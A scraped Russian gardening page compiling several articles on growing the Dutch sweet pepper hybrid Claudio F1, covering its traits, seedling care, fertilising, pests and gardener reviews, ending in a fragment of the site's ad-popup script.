0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание перца клаудио

Характеристика и описание гибрида перца Клаудио F1, выращивание и уход

Болгарский перец наряду с томатами, огурцами и картофелем считается одной из основных огородных культур. Участки под него каждую весну выделяют многие огородники. Перец Клаудио F1 – гибрид, который уже успел стать популярным у части овощеводов-любителей. Узнайте, чем он так привлекателен и как его выращивать.

Характеристики и описание гибрида

Перец Клаудио F1 – гибрид голландской селекции, полученный фирмой NUNHEMS B.V. Занесен в гостреестр России в 2007 г и районирован по Северо-Кавказскому региону. Предназначен для выращивания в условиях открытого грунта, но может расти и в теплицах. Назначение – универсальное (можно употреблять в свежем виде, для приготовления салатов, первых и вторых блюд, консервировать, использовать в заготовках). Перец принадлежит к среднеспелым гибридам.

По описанию оригинатора у перцев Клаудио:

  • кусты средней величины, полураскидистые, мощные;
  • листья средние и крупные, слабоморщинистые и морщинистые, зеленого и темно-зеленого цвета;
  • перцы призмовидные, пониклые, мясистые, с глянцевой кожицей;
  • цвет недозрелых плодов зеленый, спелых – красный.

Урожайность Клаудио F1 2,9-4,6 кг/м 2 при массе перца 100-172 г. Выход продукции товарного качества – 94-97%.

Особенности гибрида этого сладкого перца следующие:

  • отличная всхожесть семян;
  • хорошая приспосабливаемость к различным условиям выращивания;
  • жаростойкость;
  • устойчивость к вирусу табачной мозаики;
  • превосходная урожайность.

Плоды у Клаудио F1 крупные, толстостенные (6,5-7,8 мм), поэтому хорошо сохраняются при транспортировке и хранении, не утрачивая внешнего вида и вкуса.

Достоинства и недостатки

  • формируют мощные прочные кусты;
  • при должном уходе не болеют;
  • быстро начинают плодоносить;
  • дают крупные с толстыми стенками плоды, которые имеют сладкий, без горечи, вкус и сильный аромат.

Недостатки у гибрида Клаудио тоже имеются, но их не так уж и много. Те же огородники указывают на то, что перцы:

  • отличаются требовательностью к влажности и питательности грунта;
  • долго спеют, то есть становятся из зеленых красными.

Больше никаких недостатков у этого перца не наблюдается. Если правильно организовать уход за ним, всегда удается получить заявленный урожай.

Агротехника выращивания и ухода

Болгарские перцы Клаудио F1 выращивают через рассаду. С наступлением тепла растения пересаживают на грядку или в теплицу. В открытом грунте этот перец хорошо растет и развивается только в южных районах – культура требовательна к повышенным температурам и свету. В регионах с коротким прохладным летом, а также большим количеством осадков, лучше выращивать этот гибрид в искусственной среде пленочных, поликарбонатных или стеклянных теплиц.

Для пересадки на постоянное место годится рассада перцев в возрасте 45-60 дней, потому к посеву семян приступают в конце февраля — марте. Более ранние сроки практикуют на юге и для получения саженцев для выращивания в закрытом грунте. Если перец будет расти на грядке в открытом грунте, лучше сильно не спешить с выгонкой рассады. Погода весной часто бывает изменчивой, при этом рано высаженные в холодную почву растения пострадают от недостатка тепла и станут сильно отставать в росте.

Для выращивания рассады перца Клаудио F1 используют индивидуальные горшочки с дренажом. Так растения лучше растут, не затеняют друг друга, не требуют пикирования. Для посева семян выбирают плодородный, рыхлый грунт для овощных культур или готовят почву самостоятельно. Для этого смешивают перегной, дерновую землю, песок, добавляют немного торфа и опилок, обогащают состав минеральными удобрениями. Почвосмесь перед использованием проливают раствором марганцовки для дезинфекции. Емкости для рассады набивают грунтом и увлажняют.

Семена перца Клаудио F1 перед посадкой не подготавливают. Они уже обработаны производителем контактными фунгицидами, потому нет необходимости в дополнительных мерах предосторожности. Для более раннего и дружного прорастания семян их можно замочить в растворах стимуляторов роста, но это также не является обязательной процедурой. Если семена свежие, они и так всходят нормально.

Высевают семена по 1 шт. в горшочек, заглубляя в грунт на 1 см. Емкости накрывают пленкой или стеклом и ставят в теплое место. До появления всходов выдерживают температуру 25-28 ºC. Перец прорастает около 6-10 дней. При появлении ростков емкости выставляют на свет, при ранней посадке досвечивают лампами утром и вечером. Весь период выращивания придерживаются следующего температурного режима: 23-25 ºC в солнечный день, 21 ºC — в пасмурный день, 16-18 ºC — ночью.

Поливают рассаду перцев Клаудио не часто. Используют теплую (25 ºC) отстоянную воду. Каждое следующее орошение проводят после того, как высохнет верхний слой почвы в горшочках. Перец не любит переувлажнения и застоя жидкости у корней, но также плохо переносит длительную засуху. Потому при выращивании рассады за состоянием грунта необходимо следить регулярно.

За 1,5-2 месяца растения перца несколько раз подкармливают удобрениями. Используют комплексные препараты с микроэлементами в дозах и с частотой, которые рекомендованы производителем средства. Первую подкормку выполняют через 7-10 дней после появления всходов. Если выращивают гибрид Клаудио для высадки в открытый грунт, растения за 5-10 дней до этого закаливают.

Перец предпочитает расти на хорошо освещенных солнцем плодородных почвах, богатых гумусом, а также хорошо пропускающих воздух и влагу. Поэтому при осенней подготовке грядок под культуру вносят на 1 м 2 от 5 кг перегноя, 1-2 стакана золы, или фосфорно-калийные минеральные удобрения по полной норме и глубоко перекапывают. На песчаных грунтах весной добавляют селитру. Глинистые почвы разрыхляют песком или опилками. Землю в теплице готовят аналогичным образом.

Высаживают рассаду перцев на постоянное место в мае. Чтобы растения хорошо принялись и быстро пустились в рост, температура грунта на этот момент не должна быть меньше 16 ºC. Тот же минимум относится и к теплице. Растения высаживают с интервалом в 35-40 см в ряду, и оставляют 70-75 см между рядами. В грунт переносят с комом земли, заглубляя рассаду по корневую шейку. После посадки растения обязательно поливают.

Кусты гибрида Клаудио среднерослые, потому нуждаются в опоре. Растения выращивают в теплицах или на грядках в открытом грунте, подвязывая их к колышкам или размещая на шпалере. Кусты формируют в 2 или 3 стебля, регулярно удаляя лишние побеги.

Чтобы повысить урожайность, первый цветок не оставляют. Созревающий на его месте плод будет тянуть все питательные вещества на себя, что ослабит молодое растение и отложит завязывание вышерасположенных перцев.

На первом этапе развития полив проводят небольшими нормами, примерно раз в 7 дней. В период цветения и плодоношения орошение проводят чаще — 2 раза в неделю. Увеличивают и количество воды, которое выливают под 1 куст. Используют только теплую воду, полив производят под корень. На следующий день почву вокруг растений неглубоко рыхлят. Весь сезон содержат посадки в чистоте, не допуская появления сорняков.

Подкармливают перец несколько раз за вегетацию. Сначала используют жидкий коровяк, раствор птичьего помета или калийную селитру. Удобряют растения под корень. В период цветения и плодоношения применяют комплексные препараты, а также калий и магний. Хорошо отзывается перец Клаудио и на внекорневые подкормки, применение стимуляторов роста. Их чередуют с корневыми подкормками, что только увеличивает урожайность культуры.

Борьбу с вредителями и болезнями при их появлении проводят стандартно. Снимают урожай в фазе технической спелости, срезая плоды с кустов секатором.

Сладкий перец Клаудио F1: отзывы, фото, особенности гибрида

Сладкий перец Клаудио относится к гибридам голландской селекции. Это один из самых популярных сортов среди огородников, включенный в Госреестр РФ в 2007 году. Рекомендован для культивирования в регионах с жарким и продолжительным летом. Однако благодаря раннеспелости и устойчивости к температурным катаклизмам может выращиваться и в местностях с прохладной и переменчивой погодой в условиях теплицы.

Описание и характеристика сорта

Перец Клаудио F1 ценится в первую очередь за раннеспелость и неприхотливость к погодным условиям. После того как рассада высажена на постоянное место, овощевод может рассчитывать на появление первого урожая спустя 72-80 дней в фазе технической спелости.

Гибрид формирует куст высотой 60 см в открытом грунте и до 0,9 м в условиях теплицы. Надземная часть у растения полураскидистая и мощная. Куст имеет хорошую облиственность, что позволяет защищать плоды от ожогов ультрафиолетом. На одном растении формируется до 12 плодов кубовидного типа, примерно одинакового размера.

На разрезе видно, что перец имеет 3 или 4 камеры и очень толстую стенку (см. фото). Толщина стенки перикарпия может варьироваться от 0,8 до 1,4 см.

В среднем длина плодов составляет 11-13 см. Самые первые и крупные экземпляры могут вытягиваться до 18 см. Диаметр (ширина) ближе к плодоножке при этом составляет 8-9 см.

Перцы на стадии технической спелости окрашены в темно-зеленый цвет. По мере дальнейшего созревания овощи меняют окраску на красную. Вес одного экземпляра составляет в среднем 200-260 гр.

С 1 куста собирают от 1 до 1,5 кг урожая в открытом грунте и 2-2,5 кг − в защищенном.

Вкусовые характеристики перца Клаудио оцениваются потребителями на отлично. Мякоть у плодов сочная и нежная, с выраженным перечным ароматом. Кожица с глянцевым оттенком, прочная, но тонкая.

Клаудио F1 идеально подходит для потребления свежим и всех видов кулинарных переработок.

Овощи обладают хорошей лежкостью и транспортабельностью, но только в фазе молочной спелости.

Снимать плоды с кустов рекомендуется зелеными. Так овощи не будут оттягивать на себя питательные вещества, необходимые для формирования новых завязей. В домашних условиях перец дозаривает в течение 2 месяцев.

Особенности выращивания и ухода

Перед тем как сеять семена перцев на рассаду, производитель рекомендует провести замачивание или проращивание. В обеззараживании посевной материал не нуждается, так как эту обработку проводит агрофирма, выпускающая гибридный продукт.

Высевают на рассаду с 20 февраля по 10 марта. Первые сеянцы в среднем появляются спустя 7-10 дней. Рассада Клаудио F1 требует обязательного закаливания и пикирования.

На постоянное место выращивания растения переносят в середине мая или начале июня (зависит от региона и защищенности грунта). Обязательное условие − отсутствия риска возвратных заморозков.

На кв. м. размещают не более 3-4 растений из-за особенностей строения кустов.

В уходе перец Клаудио не отличается от других сортов болгарского перца. Он требует обильного увлажнения почвы раз в 3-4 дня, прополки сорняков и рыхление грунта. Гибрид отзывчив на минеральные удобрения. Внесение подкормок во время полива повышают продуктивность растения. За сезон овощную культуру подкармливают 2-3 раза.

Куст можно формировать в 2-3 стебля. Дополнительно рекомендуется удалять первый цветок в развилке и все нижние листья с пасынками.

Болезни и вредители

Перец Клаудио по описанию производителя имеет генетическую устойчивость к вирусным заболеваниям, в частности табачной мозаике и Y-вирусу картофеля.

Гибридный сорт при нарушении правил агротехники может подвергаться вершинной гнили. Особенно болезнь актуальна для южных регионов.

Для перца опасны такие вредители, как слизни, проволочник, совка, белокрылка, колорадский жук и др.

Достоинства и недостатки

Перец Клаудио по характеристике и описанию сорта оригинатором, а также отзывам овощеводов, обладает следующими достоинствами:

  • семена хорошо и дружно всходят;
  • неприхотлив в уходе;
  • устойчив ко многим заболеваниям пасленовых;
  • хорошо переносит засуху и жару;
  • формирует крупные плоды с отличными вкусовыми качествами;
  • долго хранится при снятии в фазе технической спелости;
  • показывает высокую урожайность при соблюдении правил агротехники.

Среди недостатков некоторые огородники отмечают долгое дозаривание плодов.

Похожие сорта

Перец Клаудио F1 по описанию и характеристике имеет сходство со следующими гибридами:

  • Латино F1;
  • Эскимо F1;
  • Гигант красный F

Латино − раннеспелый сладкий перец, отдающий урожай после появления всходов спустя 3,5 месяца. Растение формирует куст высотой до 1 метра. Кубовидные перцы при полной спелости имеют насыщенный красный цвет. Плоды крупные и толстостенные. Один экземпляр весит 200 гр., толщина стенки перикарпия при этом может достигать 1 см. На кв. м. высаживают до 3 растений. При такой плотности посадок с соблюдением агротехнических правил культивирования можно получить 7-14 кг урожая. Гибрид подходит для выращивания под любыми видами укрытий. Овощная культура генетический устойчива к вирусу картофельной и табачной мозаики.

Эскимо − крупноплодный гибрид, масса перцев которого варьируется от 150 до 400 гр. Темно-красные кубовидные плоды наделены сочной, мясистой стенкой и отличными вкусовыми качествами. Растение имеет компактный, полураскидистый куст, вырастающий в высоту до 0,6 м. Устойчив к холодным погодным условиям, может культивироваться в незащищенном грунте. Период созревания плодов − 2 месяца после того, как рассада перемещена на постоянное место выращивания.

Гигант красный − еще один раннеспелый продукт голландской селекции. Плоды гибрида похожи на перцы Клаудио. Они кубовидной формы, толстостенные (до 12 мм), имеют ярко-красную окраску и вес до 300 гр. Центральный стебель может достигать в длину 1 м. Этот перец любит солнце и тепло, поэтому больше подходит для южных регионов.

Отзывы огородников

«Среди всех сортов перцев наибольшее предпочтение отдаю голландскому гибриду Клаудио Ф1. Сеять на рассаду начинаю в 20-х числах февраля. В начале мая пересаживаю рассаду в теплицу. В середине июля я уже с урожаем. Не жду, чтобы перцы на кустах поменяли цвет на красный. Снимаю их зелеными, они прекрасно доспевают дома. По вкусу перцы неплохи и при технической спелости, но полный вкусовой потенциал раскрывают только при полном созревании».

«Клаудио мой любимый гибрид. У него практически всегда стопроцентная всхожесть. Хоть и не рекомендуют брать семена от гибридов, в этом году решила все же рискнуть и вырастить перец из собственно собранных зернышек. Плоды получились немного мельче и не все правильной формы. На вкусовых качествах это никак не отразилось».

«Нравится этот перец за нетребовательность в уходе. Достаточно вовремя поливать и вносить удобрения. Чтобы растения не болели, рекомендую выращивать после лука, тыквы. Ни в коем случае нельзя сажать после баклажанов, помидоров и картофеля. Если культуры чем-то болели, есть большая вероятность и заражения перца».

Гибрид Клаудио предпочитают выращивать на своем участке многие огородники за счет его высокой урожайности, неприхотливости в уходе и хорошей лежкости в фазе технической спелости. Однако у перца есть достойные конкуренты, которые ни в чем ему не уступают или даже превосходят.

Описание перца Клаудио

Перец Клаудио был выведен селекционерами Nunhems (Bayer) в Голландии. Он обладает рядом характеристик, которые привлекают огородников уже более двадцати лет. В статье рассмотрим особенности перца, способ выращивания и рекомендации по уходу.

Характеристика

Перец сорта Клаудио f1 относится к раннеспелым: от появления всходов до момента сбора плодов проходит от 75 до 80 дней.

Урожайность этого вида хорошая. Перцы дозревают, практически, одновременно. При первой волне, на растении завязывается от 7 до 10 плодов, в дальнейшем завязь менее обильная (6-8 плодов).

Клаудио — сладкий перец. Подходит для выращивания на открытых грядках, но возможно его выращивание и пленочных или стеклянных теплицах. Сорт отличается хорошей транспортабельностью и длительным сроком хранения. Клаудио ф1 жаростоек, плоды очень редко пекутся даже на сильном солнце.

Описание куста

Описание куста: растение детерминантного типа, полураскидистое. Кусты довольно мощные, средней высоты, которая колеблется от 100 до 120 см в условиях теплого климата. Подвязка является необходимой.

Перец Клаудио имеет много листьев. Они большие, имеют насыщенный темно-зеленый окрас. Морщины видны очень слабо.

Описание плода

Характеристика плодов: плоды крупные, их вес может достигать от 100 до 180 гр (в среднем), но часто достигает и 200 — 250 гр. Они имеют удлиненную кубовидную форму с разделением на 4 камеры.

Перец сорта Клаудио имеет прочную глянцевую поверхность. По наступлению технической спелости, плоды имеют ярко-зеленый окрас, который позже (во время полного созревания) изменится на насыщенно-красный, даже бордовый.

Толщина стенок отличается, и, в зависимости от условий выращивания, колеблется от 6 до 13-14 мм. Мякоть очень сочная, мясистая и вкусная, горечь отсутствует. Приятный, слегка пряный аромат. Благодаря этому, их чаще всего употребляют в сыром виде, но хороши они также для приготовления салатов, тушения, консервирования и фаршировки.

Преимущества

К преимуществам сорта можно отнести:

  • раннеспелость;
  • хорошая урожайность;
  • устойчивость ко многим болезням;
  • отличные вкусовые качества;
  • хорошая транспортабельность и длительный срок хранения;
  • универсальность использования плодов;
  • семена имеют хорошую всхожесть;
  • устойчивость к жаре.

Среди недостатков выделяют следующие:

  • потребность в постоянном комплексном уходе;
  • высокий риск поражения насекомыми;
  • требовательность к поливу.

Посев и высадка

Оптимальным для этого сорта выращивание рассадным способом. Считается, что семена перца Клаудио f1 следует начинать высевать в конце февраля – марта (в зависимости от региона).

Значительную роль играет почва.Она должна быть достаточно плодородной и иметь нейтральную кислотность. Перед высадкой рассады, грядку необходимо хорошо вскопать, убрать сорняки, а также известковать ее.

Перед высадкой рассаду необходимо закалить, а в первые 6-7 дней после пересадки, необходимо держать ее в тени и следить за влажностью почвы. Оптимальным, для хорошего роста растений, расстоянием считается 30 х 30 (35 х 35) см. Почва для высадки должна быть хорошо прогретой и достаточно увлажненной.

За болгарским перцем Клаудио f1 нужен регулярный уход. Независимо от места культивирования растений, на открытой почве или в теплицах, должен соблюдаться правильный температурный режим. Во время роста растений следует поддерживать температуру — 22°, а при созревании перцев – увеличить до 25-26°.

При этом нельзя забывать и о поливе и наличии хорошего освещения. Правильным считается орошение прогретой водой ближе к вечеру. А недостаток света может спровоцировать образование плодов странной формы и значительное вытягивание стеблей.

Описание сорта указывает на то, что подкормка растений состоит из трех этапов. Перед цветением, лучше всего, вносить в почву перепревший навоз. Фосфорные удобрения используют после появления завязей, а калийные необходимо вносить на стадии дозревания плодов.

Растения формируют не только в 1,2 и 3 стебля, удаляя остальные побеги. Первая развилка на кусте информирует о том, что необходимо удалять нижние листья и бутоны.

Возможные болезни

Перец имеет хороший иммунитет ко многим распространенным болезням. Ему не страшны ни вирус табачной мозаики, ни вирус картофеля, ни крепчатость перцев.

Сорт часто поражается тлей, белокрылкой и личинками жуков. Во избежание этого, необходимо обрабатывать растения специальными препаратами.

Перец Клаудио: отзывы, фото, урожайность, характеристика и описание сорта, достоинства и недостатки

Перец Клаудио отзывы, фото, урожайность, характеристика и описание сорта которого представлены в этой статье, выведен голландскими селекционерами. Гибридный сорт перца Клаудио характеризуется устойчивостью ко многим заболеваниям и ранним сроком созревания плодов. Также огородники отмечают красивый вид перцев и их отличные вкусовые качества.

Описание и характеристика сорта

Гибрид Клаудио вывели селекционеры Голландии.

  • Перец этого сорта можно выращивать в теплицах и открытом грунте.
  • Обладает ранним сроком созревания. Плоды достигают технической зрелости спустя 70-80 дней после пересадки рассады на постоянное место.
  • Всхожесть семян составляет 97-100%.
  • Кусты прямостоячие, в высоту вырастают до 70 см.
  • Листья большие зелёного цвета с лёгкой морщинистостью. Защищают плоды от прямых солнечных лучей.
  • Кусты перца Клаудио рекомендуется подвязывать к опоре, так как стебли могут упасть под весом плодов.
  • Высокая урожайность. Один куст дает порядка 12 перцев, примерно 2,5 кг.
  • Обладает хорошим иммунитетом к вирусу табачной мозаики. Если это заболевание поражает растения, их приходится полностью уничтожать. Чаще всего грибковые болезни появляются на перцах, которые выращиваются при повышенной влажности. Бороться с ними можно методом опрыскивания растений такими препаратами, как Актара, Оксихом, Барьер, Заслон. Обработку повторяют через 20 дней.

Характеристика плодов

  • Плоды имеют призмовидную форму.
  • Незрелые перцы окрашены в зелёный цвет, в стадии биологического созревания становятся тёмно-красными.
  • Каждый плод в среднем весит 200-250 г.
  • Стенки толстые около 10 мм.
  • Внутри расположены 4 семенных камеры.
  • Отличный вкус.
  • Хорошая лежкость.

Важно! При сборе перцев в стадии технического созревания, их срок хранения составляет 60 дней. Если плоды покраснели, их нужно переработать как можно быстрее.

  • Устойчивость к длительным перевозкам.

Далее представлены в фото перцев сорта Клаудио.

Достоинства и недостатки

У этого гибрида есть множество положительных качеств, о которых поговорим дальше:

  • Высокая урожайность.
  • Товарный вид.
  • Отличный вкус.
  • Дружная и одновременная всхожесть семян и созревание плодов.
  • Можно выращивать в открытом и закрытом грунте.
  • Быстро приспосабливается к различным погодным условиям.
  • Устойчив к транспортировке.
  • Универсальность применения.

Однако кроме преимуществ, у этого сорта также есть свои недостатки:

  • Требователен к уровню влажности грунта.
  • Долго переходит от технической в биологическую стадию созревания.

Особенности выращивания

Гибридный сорт перцев Клаудио F1 культивируют при помощи рассады.

Когда и как сажать

Семена на рассаду высевают в конце февраля-начале марта. Перед этим их погружают в стакан с водой, температура которой составляет 50 градусов. После набухания семян, их заворачивают во влажную ткань и оставляют в тепле на 3 суток. Данная процедура необходима для стимуляции появления ростков.

Совет! Семена с цветной оболочкой не нуждаются в дополнительной обработке, так как уже покрыты питательной смесью, их нельзя замачивать.

Грунт покупают в садовом магазине или готовят самостоятельно по такому рецепту:

  • 1 стакан перегноя;
  • 1 стакан песка;
  • 1 стакан садовой земли;
  • 1 ст. ложка древесной золы.

Смесь тщательно перемешивают и обеззараживают в духовке в течение 30 минут при 160 градусов. После того, как грунт остынет, его выкладывают в отдельные стаканчики.

Так как рассада перца плохо переносит пикировку, рекомендуется сразу использовать отдельные емкости.

Семена заглубляют почву на 1-2 см. В 1 стаканчик можно посадить несколько семян, чтобы в дальнейшем оставить только самое крепкое растение.

Совет! Высевать семена также можно в торфяные горшочки, тогда готовить грунт не надо.

После процедуры почву поливают теплой водой из пульверизатора, емкости накрывают пленкой или стеклом и выдерживают несколько дней в тёплом помещении, пока посевной материал не прорастет.

После появления всходов плёнку убирают, придерживаются такой агротехники:

  • температура днём должна составлять около 26 градусов;
  • ночью температура снижают до 12 градусов;
  • почва должна быть умеренно влажной;
  • поливают рассаду тёплой отстоянной водой.

Также необходимо поддерживать определенный уровень влажности воздуха. Для этого перцы опрыскивают теплой водой. Если использовать холодную воду, это окажется стрессом для растений, и они замедлят рост на несколько недель или заболеют.

Помещение, где находится рассада, надо ежедневно проветривать. Для нормального роста саженцы должны получать каждый день 12 часов дневного света. При необходимости надо организовать дополнительную подсветку.

Подкормка рассады

До высадки в грунт рассаду можно подкормить 2 раза. Когда у растений появится второй листок, проводят подкормку жидким удобрением Агрикола или Фертика или для удобрения на 10л воды берут:

  • 50 г Мочевины;
  • 30 г Калийной соли;
  • 125 г Суперфосфата.

Данную процедуру повторяют через 2 недели.

После удобрения рассаду нужно сразу полить чистой водой. По мере роста саженцев землю в емкости досыпают.

Пересадка рассады в грунт

Когда на рассаде начнут формироваться первые бутоны, ее пересаживают в теплицу или открытый грунт. Это происходит примерно в конце мая. К тому времени среднесуточная температура воздуха должна составлять около 15 градусов.

Кусты перца хорошо растут в легкой почве со слабой кислотностью. Грунт готовят с осени. Выбирают те места, на которых до этого росли кабачки, огурцы, лук, тыква, морковь.

Совет! Не стоит высаживать перец на то место, где до этого выращивали картофель, томаты, баклажаны.

Осенью участок хорошо перекапывают и добавляют на 1 кв. м:

  • 5 кг компоста;
  • 50 г суперфосфата;
  • 50 г сульфата калия.

Весной участок опять перекапывать и вносят 30 г аммиачной селитры на 1 кв. м перед высадкой рассады.

Схема посадки составляет 40*70 см.

Рассаду переносят в лунки, в которые предварительно добавляют по 1 ст. л. любого комплексного удобрения с содержанием фосфор, азота и калия (суперфосфат). Необходимо следить, чтобы корневая шейка находилась на уровне с грунтом. Далее лунки засыпают землей, немного уплотняют, обильно поливают тёплой водой и мульчируют торфом.

Применение

Перец сорта Клаудио можно употреблять в свежем виде, а также готовить из него различные заготовки на зиму. Благодаря своим отличным вкусовым качествам, он идеален для свежих салатов.

Посмотрите видео! Перец Клаудио. Гибрид крупный и урожайный

Отзывы кто сажал

Далее вы можете ознакомиться с отзывами огородников, которые точно знают, как выращивать перец Клаудио и какие трудности могут при этом возникнуть.

Людмила Петровна, Курская область

Виктория Тарасовна, Самарская область

Евгений Борисович, Смоленская область

Анна Николаевна, Краснодарский край

Галина Семеновна, Новгородская область

Сергей Евгеньевич, Московская область

Ирина Леонидовна, Псковская область

Владимир Викторович, Ленинградская область

Урожайный подарок от голландской фирмы «Nunhems» — перец Клаудио F1: характеристика и описание сорта

Перец Клаудио F1 – голландский гибрид, созданный селекционерами фирмы Nunhems. Семена этой фирмы всегда дружно всходят, из них получаются здоровые и сильные растения с крупными, вкусными плодами. У гибрида высокая урожайность и прекрасный вкус, его можно выращивать как для себя, так и на продажу.

Описание и характеристика сорта

Перец болгарский, то есть сладкий, Клаудио Ф1, создан в Голландии. Распространителем аналога семян является фирма «Престиж». Его можно выращивать в теплицах или открытом грунте. В средней полосе и на юге он хорошо себя чувствует без тепличных сооружений, но может потребоваться временное укрытие из пленки при снижениях температуры.

Высота куста составляет 70-80 см. Листья темно-зеленые, слегка морщинистые. По срокам созревания перец очень ранний: первые плоды достигают технической зрелости через 70-80 дней после всходов, а биологической – спустя 2-3 недели после этого.

Перцы имеют призмовидную форму, в биологической зрелости они красные. Размеры очень крупные – по 200-250 г. Стенки очень толстые, до 10 и даже 11 мм. В диаметре плоды около 8 см, а в длину – до 16 см.

Вкусовые качества высокие, мякоть сладкая, ароматная, сочная. Использовать можно для свежих блюд, консервации, заморозки и в кулинарных рецептах.

Преимущества и недостатки

  • высокая всхожесть семян до 97-100%;
  • раннеспелость;
  • стрессоустойчивость;
  • иммунитет к табачной мозаике;
  • устойчивость к ожогам;
  • прекрасный вкус;
  • высокая урожайность;
  • хороший товарный вид и выровненные плоды;
  • отличная транспортабельность и лежкость.

Минусы:

  • семена, полученные из урожая, могут не дать таких же качественных плодов.

Урожайность

С 1 куста получают около 2,5 кг плодов. Одновременно на растении вызревает до 12 перцев.

Посадка

Голландские семена высаживают в конце февраля или начале марта.

Подготовка семян

Посадочный материал гибридов обычно продается уже обеззараженным и обработанным стимуляторами. Можно замочить его для ускорения всхожести. Семена кладут в теплую воду (но не теплее +50 градусов) и дают набухнуть, затем перекладывают на блюдце, устеленное сырой тканью, или заворачивают во влажную тряпочку. Через 2-3 дня появятся ростки, и семена осторожно заделывают в неглубокие бороздки.

Подготовка к посеву

Почву готовят по рецепту:

  • 1 часть почвы с огорода;
  • 1 часть песка;
  • 1 часть перегноя или торфа;
  • 1 стакан золы на 10 кг смеси.

Смесь проливают кипятком, в котором разведен 1% марганцовки, или прожаривают в печи на противне при +100-110 градусах. Можно также приобрести готовый грунт для томатов и перцев в магазине.

Гибрид Клаудио рекомендуется сеять сразу в индивидуальные емкости, чтобы не травмировать пересадками. Оптимальная посуда – торфяные горшочки, но подойдут и пластиковые. В каждую емкость сеют по 2-3 семечка, увлажняют и ставят в тепло (+25-28 градусов). После всходов переносят на подоконник.

Рассадный период и условия

Перцу требуется тепло и длительное освещение. Дневная температура должна быть на уровне +20-26 градусов, ночную можно немного снизить, но не менее +12. Если световой день короче 12 часов, используют специальные лампы для рассады.

Поливают по необходимости отстоянной теплой водой, помещение проветривают. Рассаду подкармливают дважды: в фазе 2 листьев и спустя 2 недели после первой подкормки. Используют комплексы наподобие препарата «Агрикола».

Высадка

В мае рассаду переносят на участок. У кустов должно быть по 6-10 листочков и первые бутоны. Почва должна прогреться до +15.

Выбирают грядки в солнечном месте. Оптимальные предшественники – морковь, капуста, лук, тыква, кабачки, редька, редис, горох, фасоль. После томатов, картофеля, баклажанов и других сортов перца сажать можно только через 3-4 года.

Участок лучше подготовить с осени:

  1. Удалить старую ботву и остатки растений.
  2. Глубоко вскопать.
  3. При необходимости продезинфицировать.
  4. Внести удобрения: смесь из 50 г сульфата калия, 50 г суперфосфата и 5 кг компоста на каждый квадратный метр. Весной на такое же количество почвы добавляют по 30 г аммиачной селитры.

Проделывают лунки по схеме 40 на 70 см. В них кладут немного минеральных удобрений, но в них не должно быть слишком много азота. Сильно заглублять кустики не следует, они не пускают боковых корней. Высаживать лучше в мокрые лунки, обильно залитые водой.

Выращивание и уход

Формирование

Растения формируют и ведут в 2-3 стебля. При необходимости сооружают опоры. До первой развилки осторожно обрезают все побеги, ветви и листья. Также срезают центральный цветок с главного побега (стебля).

Полив

После укоренения поливают 1-2 раза в неделю. Во время плодообразования поливают дважды в неделю или чаще. Необходимо избегать длительных засух и застоя влаги. Используют теплую воду, отстоянную на солнце. Ее вносят под корень на рассвете или после заката, чтобы избежать ожогов от прямых солнечных лучей.

Подкормка

Перец подкармливают трижды за сезон минеральными удобрениями. Они должны содержать сбалансированное количество азота, калия и фосфора. Молодые кусты можно однократно полить раствором куриного помета 1:10, но чаще повторять процедуру нельзя, иначе от передозировки азота снизится урожайность.

Защита от болезней и вредителей

Из болезней для перца опасны грибки. Они развиваются при загущенности посадок, излишней сырости и холоде. Против них применяют препараты с медью, например, «Оксихом». Для профилактики фитофтороза опрыскивают раствором 1 л молочной сыворотки и 4-7 капель йода на ведро воды.

Против вредителей применяют инсектициды или мыльный раствор, настой луковой шелухи, чеснока, чистотела.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
